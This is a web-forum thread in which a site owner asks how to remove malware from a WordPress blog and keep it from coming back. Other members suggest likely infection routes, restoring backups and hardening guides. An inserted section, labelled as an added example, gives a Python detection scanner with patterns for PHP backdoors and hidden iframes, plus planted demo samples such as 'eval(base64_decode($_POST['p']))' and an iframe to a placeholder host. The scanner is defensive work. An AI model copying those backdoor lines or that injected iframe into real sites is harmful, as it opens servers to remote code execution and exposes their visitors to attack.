Malware - How Can it be Avoided?

Wade Henderson

He has: 29 posts

Joined: Mar 2009

I was just the victim of a malware attack on one of my sites. I have been able to get rid of most of it, except for in the blog, which I am still trying to clean up. I am nearly at the point of deleting it and starting fresh on the blog.

I am not sure how it got there in the first place. Can you tell me how I can prevent this from happening again?

Are there any good tools you can recommend for pinpointing all the infections so I can clean up the site?

Also, where can I report this issue to so that it can be dealt with? I do not want to say the domain name that caused the issue for 2 reasons. First is that it is a porn site and the domain name makes reference to a woman's genitals and an action that goes with that. Second is that I do not want to advertise for them...

Any help you can offer would be appreciated.

Thanks

Wade

decibel.places

He has: 1,494 posts

Joined: Jun 2008

Wade H wrote:
reference to a woman's gentiles

haha, like nuns?

gentile women

ohhh, you mean genitals :P

decibel.places

He has: 1,494 posts

Joined: Jun 2008

Wade,

sorry, couldn't resist. :D

hmmm, I am not an expert on malware attacks on web sites

have you searched on the name of the bug?

I can see two ways for it to get into your code

1. You put it there by using some pre-written code that has the baddie in it waiting to be activated.

2. It was injected by insecure PHP forms that allowed it to be "added" to your files.

Given the nature of the site, there is a lot of shady sh*t going on, also cutthroat competition.

Again, a search on the bug's name can help you decide how to deal with it.

Restoring your site to a backup will fix scenario #2, but you will need to evaluate your security before you are infected again. It will do nothing if you are placing the malware there yourself.

err - what does this have to do with your financial site? if you want to promote it, a link in your sig is appropriate, you may not just add a project to an unrelated post...

greg

He has: 1,581 posts

Joined: Nov 2005

Also, the website from the project you have attached in your post has malware.
I clicked the blog link on your site and was confronted with the "Attack Report Site".

So it seems more than one of your sites has been attacked. Are you using the same scripts on all sites? Perhaps a plugin in Wordpress? Or are all your sites being attacked for a reason?

Sometimes if you rub someone up the wrong way in a forum they can be vindictive and seek revenge, spamming or DOSing your site.

Wade Henderson

He has: 29 posts

Joined: Mar 2009

The site that is posted was the one that was attacked...this is the only one that has had a problem.

It was originally on my index page, but that has been cleaned up, but I cannot seem to get it off the blog. Like I was saying, I am about to delete the blog and start fresh if I cannot find a solution...

That is why I referenced this site, not as a ad, just as a reference to the site that I am having an issue with.

The plugin for WordPress is not the same as the other sites I have as they were done at different times.

I have changed all FTP and passwords but I would really like to know how to prevent this in the future.

Really makes me mad all the work that goes into our sites and then people do this kind of thing...

Wade

greg

He has: 1,581 posts

Joined: Nov 2005

I didn't realise the site in question was the attached project.
You don't need to attach a project to reference a site, a link in the thread is fine. Also, perhaps it's worth removing the project from TWF until you get the malware issue resolved, as Google claims it has 10 malicious software exploits downloaded and installed without user consent.

Not sure why you cannot get it off the blog.
If it's not just text in articles that need deleting then it might be in a script.

But it's somewhere in the code or article or database, and looking at your scripts should allow you to delete it and find the cause.

If it's directly in the blog files (page.php, archive.php etc) then it sounds like they have managed to write to your files.
If it's in the DB somewhere then they have gained access to that. Otherwise it might just be articles.

Prevention will come when you find out where the code is, and how they did it.
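The two places the thread points at are the same places a triage pass should look: files in the theme and plugin tree (decibel.places's "pre-written code with the baddie in it" and greg's page.php/archive.php), and article bodies in the database. The script below is an added example written for this thread, not code from the forum or from WordPress; it walks a site tree for common indicators of a dropped backdoor or injected markup, lists recently modified files, and runs the same markup checks over post content you have pulled from the database yourself. The directory layout, the planted sample files, the post bodies and the `malware-host.invalid` hostname are all constructed for the demo. Every hit is an indicator to read by hand, not proof of compromise.

```python
"""Triage scanner for a PHP/WordPress site tree (added example, not forum code)."""
import os
import re
import tempfile
import time
from pathlib import Path

# Indicators seen in dropped PHP backdoors: decoded-then-evaluated strings, the old
# preg_replace /e trick, and calling a function whose name comes straight from the request.
PHP_PATTERNS = {
    "eval_of_decoded_string": re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "preg_replace_e_modifier": re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", re.I),
    "dynamic_function_from_request": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I),
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}
# Indicators of injected markup in templates, static pages or article bodies.
HTML_PATTERNS = {
    "hidden_iframe": re.compile(
        r"<iframe[^>]*(visibility\s*:\s*hidden|display\s*:\s*none|width\s*=\s*[\"']?0)", re.I),
    "obfuscated_inline_script": re.compile(
        r"<script[^>]*>\s*(eval|unescape|String\.fromCharCode)\s*\(", re.I),
}
TEXT_SUFFIXES = {".php", ".html", ".htm", ".js", ".txt"}


def scan_text(text, patterns):
    """Return [(indicator_name, line_number)] for every pattern hit in a text blob."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in patterns.items():
            if rx.search(line):
                hits.append((name, lineno))
    return hits


def scan_tree(root):
    """Scan every text-like file under root; PHP files get both pattern sets."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in TEXT_SUFFIXES:
            continue
        patterns = {**PHP_PATTERNS, **HTML_PATTERNS} if path.suffix.lower() == ".php" else HTML_PATTERNS
        hits = scan_text(path.read_text(errors="replace"), patterns)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def recently_modified(root, days):
    """Files touched in the last N days: where a write-to-files compromise usually shows first."""
    root = Path(root)
    cutoff = time.time() - days * 86400
    return sorted(p.relative_to(root).as_posix()
                  for p in root.rglob("*") if p.is_file() and p.stat().st_mtime >= cutoff)


def scan_posts(posts):
    """posts: iterable of (post_id, post_content) rows exported from the database."""
    findings = {}
    for post_id, content in posts:
        hits = scan_text(content, HTML_PATTERNS)
        if hits:
            findings[post_id] = hits
    return findings


def build_demo_site():
    """Constructed throwaway tree: one clean, month-old file and two planted indicators."""
    root = Path(tempfile.mkdtemp(prefix="site_"))
    clean = root / "index.php"
    clean.write_text('<?php echo "clean front page"; ?>\n')
    month_ago = time.time() - 30 * 86400
    os.utime(clean, (month_ago, month_ago))  # age the clean file so it is not "recent"
    footer = root / "wp-content" / "themes" / "demo" / "footer.php"
    footer.parent.mkdir(parents=True)
    footer.write_text('</div>\n<iframe src="http://malware-host.invalid/x" style="visibility:hidden" '
                      'width="1"></iframe>\n<?php wp_footer(); ?>\n')
    dropped = root / "wp-content" / "uploads" / "cache.php"
    dropped.parent.mkdir(parents=True)
    dropped.write_text("<?php\n// constructed sample of a dropped backdoor, for detection only\n"
                       "eval(base64_decode($_POST['p']));\n$_GET['f']($_GET['a']);\n")
    return root


# Constructed stand-in for rows selected from the posts table.
DEMO_POSTS = [
    (1, "<p>A normal article.</p>"),
    (2, "<p>Text</p><script>eval(unescape('%61%6c%65%72%74'))</script>"),
]


def run_demo():
    root = build_demo_site()
    return scan_tree(root), recently_modified(root, days=7), scan_posts(DEMO_POSTS)


if __name__ == "__main__":
    files, recent, posts = run_demo()
    for path, hits in files.items():
        print(path, hits)
    print("recently modified:", recent)
    print("posts to review:", posts)
```

On a real site, point `scan_tree` at the document root and feed `scan_posts` the `ID, post_content` rows you export from the database; anything the scanner flags should be compared against a clean copy of the same theme, plugin or core file before you delete it, since a legitimate file can contain a long base64 string or an iframe.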

Brutal

They have: 134 posts

Joined: Feb 2009

You should only be able - advise you hire a good PHP programmer, I think it will eliminate and prevent attacks in the future, because you will pay him money for this.

They have: 3 posts

Joined: Mar 2012

There's no way to be 100% secure, but if you follow the simple guidelines for Hardening WordPress here: http://codex.wordpress.org/Hardening_WordPress, they will help, although they are the very VERY minimum/basics. There are many tools you can use to secure your sites.

They have: 31 posts

Joined: Feb 2012

It can be avoided by not surfing the Internet and not opening any unknown file executables.